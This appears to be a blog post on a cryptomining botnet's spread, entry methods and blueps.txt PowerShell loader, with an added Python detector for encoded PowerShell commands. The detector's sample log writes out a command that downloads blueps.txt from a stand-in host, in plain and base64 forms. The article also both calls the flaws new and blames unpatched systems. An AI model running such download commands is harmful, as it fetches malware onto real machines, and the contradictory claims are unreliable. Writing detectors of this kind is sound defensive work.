Pipeline Blog

The Return Of Sominru (Cryptomining botnet)


The cryptomining botnet Sominru has been around since 2017, but it has resurfaced with a bombastic campaign that primarily targeted Asia and also affected Europe and the USA. It affected more than 90,000 devices on multiple networks worldwide.

We are presenting the details from our source, Quardicore, a security firm based in Boston.

Quardicore announced in August that they had accessed a core server belonging to a threat group that was stealing data and credentials. The firm examined the server, monitored its activity, and found a botnet whose reach extended to 4900 networks and which was infecting 4700 devices per day on average. The researchers also found the malware hosted on 65 servers, from which it expanded its network. On average, the malware had at least three devices on each network.


Reason for the Breach in Security


According to Quardicore, most victims were unaware of the presence of the botnet or any malware, and the infected devices lacked the latest security patches. All victims had one thing in common: they had not patched security vulnerabilities according to the latest updates.

Furthermore, ISPs were not blocking malicious activity passing through their servers, and this freedom allowed the botnet campaign to succeed. Goldberg, a security analyst from Quardicore, said that ISPs do not protect business customers the way they protect home users. All ISPs are capable of monitoring all activity on their networks, but they are not proactive enough to block the latest attacks. That is why the Sominru botnet remained unnoticed for quite some time.



Sominru Threat Group


This group has been around for two years, and its activities have alerted many cybersecurity vendors because its method of attack is unique and targets new, unknown vulnerabilities.

The new techniques of the Sominru threat group included polymorphic malware, repackaged and modified malware, and open-source exploits. According to Carbon Black researchers, this threat group used EternalBlue scanning for lateral movement, which is very complex in nature, but all commands were either base64 encoded or just plain text. The Sominru threat group managed to do cryptomining along with stealing data and credentials, which they monetized in the dark market.


Method of Compromising Devices


The Sominru campaign used a number of ways to compromise devices, mainly brute-force attacks on MS-SQL, Remote Desktop Protocol, and Telnet.

Once the botnet is in the system, it downloads a PowerShell script named blueps.txt, which runs a number of operations on the machine. Moreover, blueps.txt executed three binary files: a worm downloader, a Trojan, and a Master Boot Record rootkit. The Sominru group used 20 PowerShell scripts during the campaign, and the executable files were designed to steal any data or credentials they found relevant.
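Because the commands were reported as either plain text or base64 encoded, a defender hunting for the blueps.txt download has to check both forms. The following is an added detection sketch, not code from Quardicore or Carbon Black: it decodes PowerShell `-EncodedCommand` arguments (base64 over UTF-16LE) and flags process command lines that reference the script name. The log lines, host name and function names are constructed for illustration.

```python
import base64
import binascii

INDICATOR = "blueps.txt"  # script name reported in the article

def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload of a command line, or None."""
    tokens = cmdline.split()
    for flag, value in zip(tokens, tokens[1:]):
        name = flag.lstrip("-/").lower()
        # PowerShell accepts any prefix of -EncodedCommand (-e, -enc, ...) and -ec.
        is_flag = flag[0] in "-/" and name != ""
        if not (is_flag and ("encodedcommand".startswith(name) or name == "ec")):
            continue
        try:
            # The payload is base64 over UTF-16LE text.
            return base64.b64decode(value, validate=True).decode("utf-16-le")
        except (binascii.Error, UnicodeDecodeError):
            continue  # not a valid payload; keep looking
    return None

def classify(cmdline):
    """Return 'plain', 'encoded' or None for one process command line."""
    if INDICATOR in cmdline.lower():
        return "plain"
    decoded = decode_encoded_command(cmdline)
    if decoded and INDICATOR in decoded.lower():
        return "encoded"
    return None

def scan(lines):
    """Return (index, kind) for every line that references the indicator."""
    hits = ((i, classify(line)) for i, line in enumerate(lines))
    return [(i, kind) for i, kind in hits if kind]

def encode_sample(script):
    """Build a constructed -EncodedCommand argument for the sample log."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

# Constructed sample command lines (not taken from the campaign).
FETCH = "Invoke-WebRequest http://host.example.invalid/blueps.txt -OutFile blueps.txt"
SAMPLE_LOG = [
    "powershell.exe -NoProfile -Command " + FETCH,
    "powershell.exe -NoP -enc " + encode_sample(FETCH),
    "powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\backup.ps1",
    "powershell.exe -e " + encode_sample("Get-Date"),
    "powershell.exe -enc not-base64!!",
]

if __name__ == "__main__":
    print(scan(SAMPLE_LOG))
```

A file name is a weak indicator on its own; the decoding step is the part worth reusing with stronger indicators from process-creation or script-block logs.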


Final Words


The Sominru campaign captured the attention of cybersecurity gurus because of two things: manipulation of ISPs and targeting of Windows devices. The botnet created by the Sominru threat group operated through various ISPs without being noticed for a long time, and this campaign showed new vulnerabilities in the Windows operating system. Gurus from Quardicore called the attack “The return of Sominru with more vengeance.”
